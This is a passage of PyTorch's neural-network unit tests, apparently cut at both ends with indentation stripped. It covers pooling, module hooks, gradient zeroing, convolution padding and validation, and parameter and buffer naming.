return self._sum_pool3d(x, kernel_size) / size
def test_doubletensor_avg_pool2d(self):
n, m = 5, 8
input = torch.rand(1, 1, n, m)
for i in range(1, n + 1):
for j in range(1, m + 1):
actual = torch.nn.functional.avg_pool2d(input[0], (i, j))
actual = actual.view(1, actual.numel())
expected = self._avg_pool2d(input, (i, j))
self.assertEqual(actual, expected, rtol=0, atol=1e-5)
def test_avg_pool2d_with_zero_divisor(self):
self.assertRaisesRegex(RuntimeError, "divisor must be not zero",
lambda: F.avg_pool2d(torch.zeros(3, 3, 3), (2, 2), divisor_override=0))
def test_doubletensor_avg_pool2d_with_divisor(self):
n, m = 3, 3
input = torch.rand(1, 1, n, m)
for i in range(1, n + 1):
for j in range(1, m + 1):
for divisor in [1, 7, i * j]:
actual = F.avg_pool2d(input[0], (i, j), divisor_override=divisor)
actual = actual.view(1, actual.numel())
expected = self._sum_pool2d(input, (i, j)) / divisor
self.assertEqual(actual, expected, rtol=0, atol=1e-5)
def test_doubletensor_avg_pool3d(self):
h, w, d = 5, 6, 7
input = torch.rand(h, w, d)
for i in range(1, h + 1):
for j in range(1, w + 1):
for k in range(1, d + 1):
actual = torch.nn.functional.avg_pool3d(input.unsqueeze(0), (i, j, k))
actual = actual.view(1, actual.numel())
expected = self._avg_pool3d(input, (i, j, k))
self.assertEqual(actual, expected, rtol=0, atol=1e-5)
def test_doubletensor_avg_pool3d_with_divisor(self):
h, w, d = 6, 5, 7
input = torch.rand(h, w, d)
for i in range(1, h + 1):
for j in range(1, w + 1):
for k in range(1, d + 1):
for divisor in [1, 7, i * j]:
actual = torch.nn.functional.avg_pool3d(input.unsqueeze(0), (i, j, k), divisor_override=divisor)
actual = actual.view(1, actual.numel())
expected = self._sum_pool3d(input, (i, j, k)) / divisor
self.assertEqual(actual, expected, rtol=0, atol=1e-5)
def test_avg_pool3d_with_zero_divisor(self):
self.assertRaisesRegex(RuntimeError, "divisor must be not zero",
lambda: F.avg_pool3d(torch.zeros(3, 3, 3, 3), (2, 2, 2), divisor_override=0))
def test_avg_pool1d_ceil_mode(self):
# Regression test for gh-36977
x = 10 * torch.randn((1, 16, 4))
y = torch.nn.functional.avg_pool1d(
x, ceil_mode=True, count_include_pad=True, kernel_size=1, stride=2)
self.assertTrue(not torch.isnan(y).any())
if TEST_CUDA:
y = torch.nn.functional.avg_pool1d(
x.to('cuda'), ceil_mode=True, count_include_pad=True, kernel_size=1, stride=2)
self.assertTrue(not torch.isnan(y).any())
def test_avg_pool2d_ceil_mode(self):
# Regression test for gh-36977
x = 10 * torch.randn((1, 16, 4, 4))
y = torch.nn.functional.avg_pool2d(
x, ceil_mode=True, count_include_pad=True, kernel_size=(1, 2),
padding=(0, 1), stride=2)
self.assertTrue(not torch.isnan(y).any())
if TEST_CUDA:
y = torch.nn.functional.avg_pool2d(
x.to('cuda'), ceil_mode=True, count_include_pad=True, kernel_size=(1, 2),
padding=(0, 1), stride=2)
self.assertTrue(not torch.isnan(y).any())
def test_avg_pool3d_ceil_mode(self):
# Regression test for gh-36977
x = 10 * torch.randn((1, 16, 4, 4, 4))
y = torch.nn.functional.avg_pool3d(
x, ceil_mode=True, count_include_pad=True, kernel_size=(1, 2, 3), stride=2)
self.assertTrue(not torch.isnan(y).any())
if TEST_CUDA:
y = torch.nn.functional.avg_pool3d(
x.to('cuda'), ceil_mode=True, count_include_pad=True, kernel_size=(1, 2, 3), stride=2)
self.assertTrue(not torch.isnan(y).any())
class TestNN(NNTestCase):
_do_cuda_memory_leak_check = True
_do_cuda_non_default_stream = True
def _forward(self, module, input: _TensorOrTensors):
with freeze_rng_state():
if isinstance(input, tuple):
return module(*input)
else:
return module(input)
def _backward(self, module, input: _TensorOrTensors, output, grad_output, create_graph=False):
output.backward(grad_output, retain_graph=True, create_graph=create_graph)
if isinstance(input, tuple):
return tuple(i.grad.data if i.grad is not None else None for i in input)
else:
return input.grad.data if input.grad is not None else None
def _forward_criterion(self, criterion, input, target, extra_args=None):
if extra_args is None:
extra_args = tuple()
if isinstance(input, tuple):
args = input + (target,) + extra_args
output = criterion(*args)
else:
output = criterion(input, target, *extra_args)
return output
def _backward_criterion(self, criterion, input, output, target, gradOutput=None, extra_args=None):
if extra_args is None:
extra_args = tuple()
input_tuple = input if isinstance(input, tuple) else (input,)
output_tuple = output if isinstance(output, tuple) else (output,)
for i in input_tuple:
if i.grad is not None:
i.grad.data.zero_()
args = input_tuple + (target,) + extra_args
if gradOutput is None:
gradOutput = torch.ones(())
criterion(*args).backward(gradOutput.to(output_tuple[0]))
if isinstance(input, tuple):
return tuple(i.grad.data for i in input)
else:
return input.grad.data
def _zero_grad_parameters(self, module):
for p in module.parameters():
if p.grad is not None:
with torch.no_grad():
p.grad.zero_()
p.grad.detach_()
def _get_parameters(self, module):
params = []
d_params = []
for p in module.parameters():
params.append(p)
d_params.append(p.grad)
return params, d_params
def _create_basic_net(self):
class Layer(nn.Module):
def __init__(self):
super(Layer, self).__init__()
self.layer_dummy_param = Parameter(torch.empty(3, 5))
self.register_buffer('layer_dummy_buf', torch.zeros(1, 3, 3, 7))
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.l1 = Layer()
self.dummy_param = Parameter(torch.empty(3, 5))
self.register_buffer('dummy_buf', torch.zeros(7, 3, 3, 1))
l = Layer()
n = Net()
s = nn.Sequential(n, n)
return l, n, s
def test_requires_grad_(self):
m = self._create_basic_net()[-1]
assert len(list(m.buffers())) > 0, 'invalid test'
        assert all(not b.requires_grad for b in m.buffers()), 'invalid test'
assert len(list(m.parameters())) > 0, 'invalid test'
        assert all(p.requires_grad for p in m.parameters()), 'invalid test'
for requires_grad in (False, True):
self.assertIs(m.requires_grad_(requires_grad), m)
for p in m.parameters():
self.assertEqual(p.requires_grad, requires_grad)
for b in m.buffers():
self.assertFalse(b.requires_grad)
def test_module_backcompat(self):
from torch.serialization import SourceChangeWarning
path = download_file('https://download.pytorch.org/test_data/linear.pt')
with warnings.catch_warnings():
warnings.simplefilter('ignore', SourceChangeWarning)
m = torch.load(path)
input = torch.randn(2, 3, dtype=torch.float)
self.assertEqual(m(input).size(), (2, 5))
def test_conv_backcompat(self):
from torch.serialization import SourceChangeWarning
# This file was generated by running on PyTorch 1.0.1 on Python 2:
#
# import torch
# from torch import nn
# m = nn.Conv2d(1, 1, 1)
# torch.save(m, 'legacy_conv2d.pt')
#
# NB: This Pickle also contains some Unicode data!
path = download_file('https://download.pytorch.org/test_data/legacy_conv2d.pt')
with warnings.catch_warnings():
warnings.simplefilter('ignore', SourceChangeWarning)
m = torch.load(path, encoding='utf-8')
input = torch.randn((1, 1, 1, 1), dtype=torch.float)
self.assertEqual(m(input).size(), (1, 1, 1, 1))
def test_share_memory(self):
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.p = nn.Parameter(torch.eye(5))
self.par = nn.ParameterList()
self.par.append(nn.Parameter(torch.randn(10)))
def forward(self, inp):
# NB: dead code
return inp.clone()
net = Net()
for p in net.parameters():
self.assertFalse(p.storage().is_shared())
for b in net.buffers():
self.assertFalse(b.storage().is_shared())
net.share_memory()
for p in net.parameters():
self.assertTrue(p.storage().is_shared())
for b in net.buffers():
self.assertTrue(b.storage().is_shared())
def _test_hooks(self, backward_register_fn):
module = nn.Sigmoid()
input = torch.ones(5, 5, requires_grad=True)
counter = {
'forwards': 0,
'backwards': 0
}
def fw_hook(inc, h_module, input, output):
self.assertIsInstance(input, tuple)
self.assertTrue(isinstance(output, torch.Tensor))
self.assertTrue(h_module is module)
self.assertEqual(input[0], torch.ones(5, 5))
self.assertEqual(output, torch.empty(5, 5).fill_(1 / (1 + 1 / math.e)))
counter['forwards'] += inc
def bw_hook(inc, h_module, grad_input, grad_output):
self.assertIsInstance(grad_input, tuple)
self.assertIsInstance(grad_output, tuple)
self.assertTrue(h_module is module)
self.assertEqual(grad_output[0], torch.ones(5, 5) * 2)
counter['backwards'] += inc
test_fwd = module.register_forward_hook(lambda *args: fw_hook(1, *args))
module(input)
module(input)
self.assertEqual(counter['forwards'], 2)
self.assertEqual(counter['backwards'], 0)
test_bwd = getattr(module, backward_register_fn)(
lambda *args: bw_hook(1, *args))
output = module(input)
self.assertEqual(counter['forwards'], 3)
self.assertEqual(counter['backwards'], 0)
output.backward(torch.ones(5, 5) * 2, retain_graph=True)
self.assertEqual(counter['forwards'], 3)
self.assertEqual(counter['backwards'], 1)
output.backward(torch.ones(5, 5) * 2, retain_graph=True)
self.assertEqual(counter['forwards'], 3)
self.assertEqual(counter['backwards'], 2)
test2_fwd = module.register_forward_hook(lambda *args: fw_hook(2, *args))
output = module(input)
self.assertEqual(counter['forwards'], 6)
self.assertEqual(counter['backwards'], 2)
test2_bwd = getattr(module, backward_register_fn)(lambda *args: bw_hook(2, *args))
module(input).backward(torch.ones(5, 5) * 2)
self.assertEqual(counter['forwards'], 9)
self.assertEqual(counter['backwards'], 5)
test2_bwd.remove()
module(input).backward(torch.ones(5, 5) * 2)
self.assertEqual(counter['forwards'], 12)
self.assertEqual(counter['backwards'], 6)
test2_fwd.remove()
module(input).backward(torch.ones(5, 5) * 2)
self.assertEqual(counter['forwards'], 13)
self.assertEqual(counter['backwards'], 7)
test_fwd.remove()
test_bwd.remove()
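# Minimal full-backward-hook usage sketch (assuming a module `m` and an
# input tensor `x` that requires grad):
#
#   handle = m.register_full_backward_hook(lambda mod, gI, gO: None)
#   m(x).sum().backward()   # the hook fires once per backward pass
#   handle.remove()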
def test_hooks(self):
self._test_hooks("register_backward_hook")
self._test_hooks("register_full_backward_hook")
def test_hook_cpp(self):
bn = nn.BatchNorm1d(5)
def hook(module, grad_inputs, grad_outputs):
self.assertEqual(len(grad_inputs), 1)
self.assertEqual(len(grad_outputs), 1)
self.assertEqual(module, bn)
bn.register_full_backward_hook(hook)
output = bn(torch.randn(5, 5, requires_grad=True))
output.sum().backward()
def test_hook_invalid_outputs(self):
module = nn.Sigmoid()
input = torch.randn(5, 5, requires_grad=True)
def bw_fail1(self, grad_input, grad_output):
return grad_input[:-1]
def bw_fail2(self, grad_input, grad_output):
return grad_input + (torch.randn(2, 2),)
with module.register_backward_hook(bw_fail1):
with self.assertRaisesRegex(RuntimeError, 'got 0, but expected 1'):
module(input).sum().backward()
with module.register_backward_hook(bw_fail2):
with self.assertRaisesRegex(RuntimeError, 'got 2, but expected 1'):
module(input).sum().backward()
def test_hook_requires_grad(self):
test_self = self
class MyModule(nn.Module):
def forward(self, arg1, arg2, arg3):
test_self.assertTrue(arg1.requires_grad)
test_self.assertFalse(arg2.requires_grad)
test_self.assertTrue(arg3.requires_grad)
return arg1.sum() + arg2.sum() + arg3.sum()
inp = torch.rand(2, requires_grad=True)
mod = MyModule()
mod(inp, inp.detach(), inp)
# Ensure that requires grad is properly propagated
mod.register_full_backward_hook(lambda mod, gI, gO: None)
mod(inp, inp.detach(), inp)
def test_hook_no_requires_grad(self):
mod = nn.Linear(2, 3)
inp = torch.rand(1, 2)
return_val = "None"
hook_called = [0]
def hook(mod, grad_input, grad_output):
hook_called[0] += 1
for gI in grad_input:
self.assertIsNone(gI)
for gO in grad_output:
self.assertEqual(gO.size(), (1, 3))
if return_val == "grad_input":
return grad_input
elif return_val == "invalid":
# If the inputs required gradients, this would be
# a valid return value
return inp
elif return_val == "None":
return None
else:
raise RuntimeError("Invalid return_val string")
mod.register_full_backward_hook(hook)
# This should run and trigger the hook properly
mod(inp).sum().backward()
self.assertEqual(hook_called[0], 1)
return_val = "grad_input"
mod(inp).sum().backward()
self.assertEqual(hook_called[0], 2)
return_val = "invalid"
with self.assertRaisesRegex(RuntimeError, "where no input requires gradient"):
mod(inp).sum().backward()
def test_hook_last_arg_requires_grad(self):
mod = nn.L1Loss()
inp = torch.rand(1, requires_grad=True)
mod.register_full_backward_hook(lambda m, gI, gO: None)
try:
mod(inp.detach(), inp)
except Exception as ex:
self.fail("Unexpected exception: %s" % ex)
def test_hook_extra_input(self):
class MyModule(nn.Module):
def forward(self, non_tensor, tensor):
return tensor.clone(), non_tensor
inp = torch.rand(2, requires_grad=True)
mod = MyModule()
def hook(mod, grad_input, grad_output):
self.assertIsNone(grad_input[0])
self.assertIsInstance(grad_input[1], torch.Tensor)
self.assertIsInstance(grad_output[0], torch.Tensor)
self.assertIsNone(grad_output[1])
mod.register_full_backward_hook(hook)
out, _ = mod(True, inp)
out.sum().backward()
def test_hook_inplace(self):
class MyModule(nn.Module):
def forward(self, inp, do_inplace):
self.inp = inp
if do_inplace:
inp += 1
return inp.clone()
hook_called = [0]
def hook(mod, grad_input, grad_output):
hook_called[0] += 1
inp = torch.rand(10, requires_grad=True)
mod = MyModule()
mod.register_full_backward_hook(hook)
# No inplace should work
mod(inp, False).sum().backward()
self.assertEqual(hook_called[0], 1)
# In-place modification of the input should raise an error
with self.assertRaisesRegex(RuntimeError, "Output 0 of BackwardHookFunctionBackward is "
"a view and is being modified inplace."):
mod(inp.clone(), True)
# Re-using the internal view after the input has been modified in place
# should also raise an error
local_inp = inp.clone()
out = mod(local_inp, False)
local_inp[0] *= 1
with self.assertRaisesRegex(RuntimeError, "Output 0 of BackwardHookFunctionBackward is "
"a view and its base or another view"):
# Any operation involving the view will fail here
mod.inp + 2
# In-place modification of the output should raise an error
out = mod(inp, False)
with self.assertRaisesRegex(RuntimeError, "BackwardHookFunctionBackward is a view "
"and is being modified inplace."):
out += 1
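# Non-full (deprecated) backward hooks only see gradients for a single
# autograd Node, so forwards whose inputs/outputs are containers, come from
# different Nodes, or pass through multiple Nodes cannot be reported
# faithfully and emit a warning instead.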
def test_hook_non_full_warning(self):
def noop(*args):
pass
a = torch.rand(2, requires_grad=True)
b = torch.rand(2, requires_grad=True)
# Check invalid input container
class MyModule(nn.Module):
def forward(self, l):
return l[0].clone(), l[1].clone()
m = MyModule()
m.register_backward_hook(noop)
with self.assertWarnsRegex(UserWarning, "does not take as input a single Tensor or a tuple of Tensors"):
m([a, b])
# Check invalid output container
class MyModule(nn.Module):
def forward(self, a, b):
return [a.clone(), b.clone()]
m = MyModule()
m.register_backward_hook(noop)
with self.assertWarnsRegex(UserWarning, "does not return a single Tensor or a tuple of Tensors"):
m(a, b)
# Check invalid output from different Nodes
class MyModule(nn.Module):
def forward(self, a, b):
return a.clone(), b.clone()
m = MyModule()
m.register_backward_hook(noop)
with self.assertWarnsRegex(UserWarning, "outputs are generated by different autograd Nodes"):
m(a, b)
# Check invalid forward with multiple Nodes
class MyModule(nn.Module):
def forward(self, a):
return a.clone().clone()
m = MyModule()
m.register_backward_hook(noop)
with self.assertWarnsRegex(UserWarning, "the forward contains multiple autograd Nodes"):
m(a)
def test_hook_backward_size(self):
# Make module with multiple operations in forward
# And different size for input and outputs
class MyModule(nn.Module):
def forward(self, arg1, arg2):
tmp = arg1.sum() * arg2
tmp = tmp + arg2.sum() * arg1.sum()
tmp = tmp.sum().view(1)
tmp = tmp.expand(8).contiguous()
return tmp
module = MyModule()
inp1 = torch.randn(5, 5, requires_grad=True)
inp2 = torch.randn(10, 10, requires_grad=True)
def bw_hook(module, grad_input, grad_output):
self.assertEqual(len(grad_input), 2)
self.assertEqual(grad_input[0].size(), torch.Size([5, 5]))
self.assertEqual(grad_input[1].size(), torch.Size([10, 10]))
self.assertEqual(len(grad_output), 1)
self.assertEqual(grad_output[0].size(), torch.Size([8]))
with module.register_full_backward_hook(bw_hook):
module(inp1, inp2).sum().backward()
def test_hook_backward_writeable(self):
module = nn.Sigmoid()
input = torch.randn(5, 5, requires_grad=True)
sig_x = torch.nn.functional.sigmoid(input)
def bw_hook(module, grad_input, grad_output):
for grad in grad_input:
self.assertTrue(isinstance(grad, torch.Tensor))
for grad in grad_output:
self.assertTrue(isinstance(grad, torch.Tensor))
return tuple(gi * 2 for gi in grad_input)
module.register_backward_hook(bw_hook)
module(input).backward(torch.ones(5, 5))
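# sigmoid'(x) = sigmoid(x) * (1 - sigmoid(x)); the hook doubles grad_input,
# hence the extra factor of 2 in the expected gradient.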
expected_grad = sig_x * (1 - sig_x) * 2
self.assertEqual(input.grad, expected_grad)
def test_hook_forward_preforward_writable(self):
module = nn.Sigmoid()
input = torch.randn(5, 5, requires_grad=True)
sig_x = torch.nn.functional.sigmoid(input)
def forward_pre_hook(m, input):
return torch.nn.functional.relu(input[0])
def forward_hook(m, input, output):
return -output
module.register_forward_pre_hook(forward_pre_hook)
module.register_forward_hook(forward_hook)
output = module(input)
expected_res = -torch.nn.functional.sigmoid(torch.nn.functional.relu(input))
self.assertEqual(output, expected_res)
output.backward(torch.ones(5, 5) * 2, retain_graph=True)
mask = (input > 0).double()
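# relu zeroes the gradient wherever input <= 0 (the mask), and the forward
# hook's negation flips the sign of the downstream gradient.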
expected_grad = -sig_x * (1 - sig_x) * 2 * mask
self.assertEqual(input.grad, expected_grad)
def test_to(self):
m = nn.Linear(3, 5)
self.assertIs(m, m.to('cpu'))
self.assertIs(m, m.to('cpu', dtype=torch.float32))
self.assertEqual(m.double(), m.to(torch.float64))
self.assertRaises(RuntimeError, lambda: m.to('cpu', copy=True))
if torch.cuda.is_available():
for cuda in ['cuda', 'cuda:0' if torch.cuda.device_count() == 1 else 'cuda:1']:
m2 = m.cuda(device=cuda)
self.assertIs(m2, m2.to(cuda))
self.assertEqual(m, m2.to('cpu'))
self.assertEqual(m2, m.to(cuda))
self.assertIs(m2, m2.to(dtype=torch.float32))
self.assertEqual(m2.double(), m2.to(dtype=torch.float64))
def test_zero_grad(self):
i = torch.randn(2, 5, requires_grad=True)
module = nn.Linear(5, 5)
for p in module.parameters():
p.requires_grad = False
module.zero_grad()
module.weight.requires_grad = True
module.zero_grad()
self.assertIsNone(module.weight.grad) # uninitialized grad
module(i).sum().backward()
self.assertIsNotNone(module.weight.grad)
self.assertGreater(module.weight.grad.data.abs().sum(), 0)
module.zero_grad()
self.assertEqual(module.weight.grad.data, module.weight.data.clone().zero_())
module.bias.requires_grad = True
module.zero_grad()
self.assertIsNotNone(module.weight.grad)
self.assertIsNone(module.bias.grad)
module(i).sum().backward()
self.assertIsNotNone(module.weight.grad)
self.assertIsNotNone(module.bias.grad)
self.assertGreater(module.weight.grad.data.abs().sum(), 0)
self.assertGreater(module.bias.grad.data.abs().sum(), 0)
module.zero_grad()
self.assertEqual(module.weight.grad.data, module.weight.data.clone().zero_())
self.assertEqual(module.bias.grad.data, module.bias.data.clone().zero_())
# Force set to None.
module.zero_grad(set_to_none=True)
self.assertIsNone(module.weight.grad)
def test_no_grad(self):
for dtype in [torch.bfloat16, torch.float, torch.double]:
module = nn.Conv2d(2, 5, kernel_size=3, padding=1).to(dtype)
input = torch.randn(1, 2, 10, 10).to(dtype)
x = input
y = input.clone()
output = module(x)
self.assertTrue(output.requires_grad)
output.backward(torch.ones(1, 5, 10, 10))
with torch.no_grad():
output2 = module(y)
self.assertFalse(output2.requires_grad)
self.assertRaises(RuntimeError, lambda: output2.backward(torch.ones(1, 5, 10, 10)))
def test_invalid_conv1d(self):
for dtype in [torch.bfloat16, torch.float, torch.double]:
module = nn.Conv1d(in_channels=3, out_channels=33, kernel_size=10, stride=1, bias=True).to(dtype)
input = torch.randn(1, 3, 4).to(dtype)
with self.assertRaisesRegex(RuntimeError,
r'Calculated padded input size per channel: \(4\). ' +
r'Kernel size: \(10\). Kernel size can\'t be greater than actual input size'):
module(input)
# Negative stride check
module = nn.Conv1d(in_channels=3, out_channels=6, kernel_size=3, stride=-1, bias=True).to(dtype)
input = torch.randn(1, 3, 4).to(dtype)
with self.assertRaisesRegex(RuntimeError, 'non-positive stride is not supported'):
module(input)
def test_mismatch_shape_conv2d(self):
x = torch.randn(1, 10, 1, 28, 28)
w = torch.randn(6, 1, 5, 5)
with self.assertRaisesRegex(RuntimeError,
r'Expected 4-dimensional input for 4-dimensional weight \[6, 1, 5, 5\],' +
r' but got 5-dimensional input of size \[1, 10, 1, 28, 28\] instead'):
F.conv2d(x, w)
def test_conv2d_discontiguous_weight(self):
# Test for https://github.com/pytorch/pytorch/issues/55781
x = torch.ones(64, 16, 16, 16)
weight = torch.arange(0, 1.0, 1 / 2.0 ** 10).reshape(32, 16, 1, 2)[:, :, :, ::2]
self.assertFalse(weight.is_contiguous())
y = torch.nn.functional.conv2d(x, weight, None)
if torch.backends.mkldnn.is_available():
# Disable MKLDNN explicitly, so that either NNPACK or THNN will be used
with torch.backends.mkldnn.flags(enabled=False):
y_ = torch.nn.functional.conv2d(x, weight, None)
self.assertEqual(y, y_)
self.assertEqual(y.sum(), 4186112.)
def test_invalid_conv2d(self):
for dtype in [torch.bfloat16, torch.float, torch.double]:
module = torch.nn.Conv2d(1, 1, kernel_size=3, dilation=2, stride=2).to(dtype)
input = torch.empty(1, 1, 4, 4).to(dtype)
self.assertRaises(RuntimeError, lambda: module(input))
module = nn.Conv2d(in_channels=3, out_channels=33, kernel_size=10, stride=1, bias=True)
input = torch.randn(1, 3, 1, 1)
with self.assertRaisesRegex(RuntimeError,
r'Calculated padded input size per channel: \(1 x 1\). ' +
r'Kernel size: \(10 x 10\). Kernel size can\'t be greater than actual input size'):
module(input)
# Negative stride check
module = nn.Conv2d(in_channels=3, out_channels=6, kernel_size=4, stride=-1, bias=True).to(dtype)
input = torch.randn(1, 3, 4, 4).to(dtype)
with self.assertRaisesRegex(RuntimeError, 'non-positive stride is not supported'):
module(input)
# Zero stride check
module = nn.Conv2d(in_channels=3, out_channels=6, kernel_size=4, stride=0, bias=True).to(dtype)
input = torch.randn(1, 3, 4, 4).to(dtype)
with self.assertRaisesRegex(RuntimeError, 'non-positive stride is not supported'):
module(input)
def test_invalid_conv3d(self):
for dtype in [torch.bfloat16, torch.float, torch.double]:
module = torch.nn.Conv3d(1, 1, kernel_size=3, dilation=2, stride=2).to(dtype)
input = torch.empty(1, 1, 4, 4, 4).to(dtype)
self.assertRaises(RuntimeError, lambda: module(input))
# Negative stride check
module = torch.nn.Conv3d(1, 1, kernel_size=3, stride=-2)
input = torch.empty(1, 1, 4, 4, 4)
with self.assertRaisesRegex(RuntimeError, 'non-positive stride is not supported'):
module(input)
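# padding='same' keeps the output spatial size equal to the input size for
# stride=1; for even kernel sizes the required padding is asymmetric, which
# the modules handle internally but F.pad must apply explicitly when a
# non-zero padding_mode is used.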
def test_Conv1d_module_same_padding(self):
# Compare module against functional: without strides/dilation, asymmetric padding
x = torch.rand(1, 1, 20)
module = nn.Conv1d(in_channels=1, out_channels=1, kernel_size=10,
padding='same')
expect = F.conv1d(x, module.weight, module.bias, padding='same')
self.assertEqual(expect, module(x))
# Test dilation, symmetric padding
module = nn.Conv1d(in_channels=1, out_channels=1, kernel_size=10,
padding='same', dilation=2)
expect = F.conv1d(x, module.weight, module.bias, padding='same', dilation=2)
self.assertEqual(expect, module(x))
# Test non-zero padding_mode, requiring explicit padding
module = nn.Conv1d(in_channels=1, out_channels=1, kernel_size=10,
padding='same', padding_mode='replicate')
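# kernel_size=10 needs k - 1 = 9 total padding; 'same' splits it as
# [4, 5], with the extra element on the right.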
x_padded = F.pad(x, [4, 5], mode='replicate')
expect = F.conv1d(x_padded, module.weight, module.bias, padding='valid')
self.assertEqual(expect, module(x))
self.assertEqual(x.size(), expect.size())
# Test construction with invalid padding string raises
with self.assertRaisesRegex(ValueError, 'Invalid padding string'):
module = nn.Conv1d(in_channels=3, out_channels=33, kernel_size=10, padding='foo')
# Test construction with same padding and strides raises
with self.assertRaisesRegex(ValueError, "padding='same'"):
module = nn.Conv1d(in_channels=3, out_channels=33, kernel_size=10, padding='same', stride=2)
def test_Conv2d_module_same_padding(self):
# Compare module against functional:
# without strides/dilation, both symmetric and asymmetric padding
x = torch.rand(1, 1, 9, 20)
module = nn.Conv2d(in_channels=1, out_channels=1, kernel_size=(5, 10),
padding='same')
expect = F.conv2d(x, module.weight, module.bias, padding='same')
self.assertEqual(expect, module(x))
# with dilation, symmetric padding
module = nn.Conv2d(in_channels=1, out_channels=1, kernel_size=(3, 4),
padding='same', dilation=(1, 2))
expect = F.conv2d(x, module.weight, module.bias, padding='same', dilation=(1, 2))
self.assertEqual(expect, module(x))
# Test non-zero padding_mode, requiring explicit padding
module = nn.Conv2d(in_channels=1, out_channels=1, kernel_size=(3, 4),
padding='same', padding_mode='reflect')
x_padded = F.pad(x, [1, 2, 1, 1], mode='reflect')
expect = F.conv2d(x_padded, module.weight, module.bias, padding='valid')
self.assertEqual(expect, module(x))
self.assertEqual(x.size(), expect.size())
# Test construction with invalid padding string raises
with self.assertRaisesRegex(ValueError, 'Invalid padding string'):
module = nn.Conv2d(in_channels=3, out_channels=33, kernel_size=10, padding='foo')
# Test construction with same padding and strides raises
with self.assertRaisesRegex(ValueError, "padding='same'"):
module = nn.Conv2d(in_channels=3, out_channels=33, kernel_size=10, padding='same', stride=2)
with self.assertRaisesRegex(ValueError, "padding='same'"):
module = nn.Conv2d(in_channels=3, out_channels=33, kernel_size=10, padding='same', stride=(1, 3))
with self.assertRaisesRegex(ValueError, "padding='same'"):
module = nn.Conv2d(in_channels=3, out_channels=33, kernel_size=10, padding='same', stride=(4, 1))
def test_Conv3d_module_same_padding(self):
# Compare module against functional:
x = torch.rand(1, 1, 4, 4, 4)
# without dilation, both symmetric and asymmetric padding
module = nn.Conv3d(in_channels=1, out_channels=1, kernel_size=(2, 3, 4),
padding='same')
expect = F.conv3d(x, module.weight, module.bias, padding='same')
self.assertEqual(expect, module(x))
# with dilation, both symmetric and asymmetric padding
module = nn.Conv3d(in_channels=1, out_channels=1, kernel_size=(2, 3, 4),
padding='same', dilation=(3, 2, 1))
expect = F.conv3d(x, module.weight, module.bias, padding='same', dilation=(3, 2, 1))
self.assertEqual(expect, module(x))
# Test non-zero padding_mode, requiring explicit padding
module = nn.Conv3d(in_channels=1, out_channels=1, kernel_size=(2, 3, 4),
padding='same', padding_mode='circular')
x_padded = F.pad(x, [1, 2, 1, 1, 0, 1], mode='circular')
expect = F.conv3d(x_padded, module.weight, module.bias, padding='valid')
self.assertEqual(expect, module(x))
self.assertEqual(x.size(), expect.size())
# Test construction with invalid padding string raises
with self.assertRaisesRegex(ValueError, 'Invalid padding string'):
module = nn.Conv3d(in_channels=3, out_channels=33, kernel_size=10, padding='foo')
# Test construction with same padding and strides raises
with self.assertRaisesRegex(ValueError, "padding='same'"):
module = nn.Conv3d(in_channels=3, out_channels=33, kernel_size=10, padding='same', stride=2)
with self.assertRaisesRegex(ValueError, "padding='same'"):
module = nn.Conv3d(in_channels=3, out_channels=33, kernel_size=10, padding='same', stride=(1, 1, 3))
with self.assertRaisesRegex(ValueError, "padding='same'"):
module = nn.Conv3d(in_channels=3, out_channels=33, kernel_size=10, padding='same', stride=(1, 4, 1))
with self.assertRaisesRegex(ValueError, "padding='same'"):
module = nn.Conv3d(in_channels=3, out_channels=33, kernel_size=10, padding='same', stride=(5, 1, 1))
def _test_alpha_dropout(self, cls, input):
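# Alpha dropout is designed to preserve the input's mean and standard
# deviation (self-normalizing networks), so both should survive roughly
# unchanged for any dropout probability.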
mean = input.mean()
std = input.std()
for p in [0.2, 0.5, 0.8]:
module = cls(p)
input_var = input.detach().clone().requires_grad_()
output = module(input_var)
# output mean should be close to input mean
self.assertLess(abs(output.data.mean() - mean), 0.1)
# output std should be close to input std
self.assertLess(abs(output.data.std() - std), 0.1)
output.backward(input)
def test_parameters_and_named_parameters(self):
def names(named_parameters):
return [k for k, _ in named_parameters]
l, n, s = self._create_basic_net()
self.assertEqual(len(list(l.parameters())), 1)
self.assertEqual(
names(l.named_parameters()),
['layer_dummy_param'])
self.assertEqual(len(list(n.parameters())), 2)
self.assertEqual(
names(n.named_parameters()),
['dummy_param', 'l1.layer_dummy_param'])
self.assertEqual(len(list(n.parameters(recurse=False))), 1)
self.assertEqual(
names(n.named_parameters(recurse=False)),
['dummy_param'])
self.assertEqual(len(list(s.parameters())), 2)
self.assertEqual(
names(s.named_parameters()),
['0.dummy_param', '0.l1.layer_dummy_param'])
def test_buffers_and_named_buffers(self):
def names(named_buffers):
return [k for k, _ in named_buffers]
l, n, s = self._create_basic_net()
self.assertEqual(len(list(l.buffers())), 1)
self.assertEqual(
names(l.named_buffers()),
['layer_dummy_buf'])
self.assertEqual(len(list(n.buffers())), 2)
self.assertEqual(
names(n.named_buffers()),
['dummy_buf', 'l1.layer_dummy_buf'])
self.assertEqual(len(list(n.buffers(recurse=False))), 1)
self.assertEqual(
names(n.named_buffers(recurse=False)),
['dummy_buf'])
self.assertEqual(len(list(s.buffers())), 2)
self.assertEqual(
names(s.named_buffers()),
['0.dummy_buf', '0.l1.layer_dummy_buf'])
def test_call_supports_python_dict_output(self):
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.l1 = nn.Linear(10, 20)
self.register_backward_hook(self.hook)
self.check_backward_hook_flag = False
def hook(self, module, grad_input, grad_output):
self.check_backward_hook_flag = True
def forward(self, inputs):
return {"output": self.l1(inputs).sum()}
net = Net()
model_output = net(torch.randn([5, 10]))
model_output["output"].backward()
self.assertTrue(net.check_backward_hook_flag)
def test_children(self):
l1 = nn.Linear(2, 2)
l2 = nn.Linear(2, 2)
l3 = nn.Linear(2, 2)
l4 = nn.Linear(2, 2)
subnet = nn.Sequential(l3, l4)
s = nn.Sequential(l1, l2, l1, l2, subnet)
self.assertEqual(list(s.children()), [l1, l2, subnet])
def test_train_errors_for_invalid_mode(self):
class SubclassNet(nn.Module):
def __init__(self):
super(SubclassNet, self).__init__()
self.l1 = nn.Linear(2, 2)
def forward(self, inputs):
return self.l1(inputs)
subclass_net = SubclassNet()
sequential_net = nn.Sequential(nn.Linear(2, 2), nn.Linear(2, 2))
error_modes = ["invalid_str", torch.device('cpu')]
modules_to_check = [subclass_net, sequential_net]
for error_mode, module in itertools.product(error_modes, modules_to_check):
with self.assertRaises(ValueError):
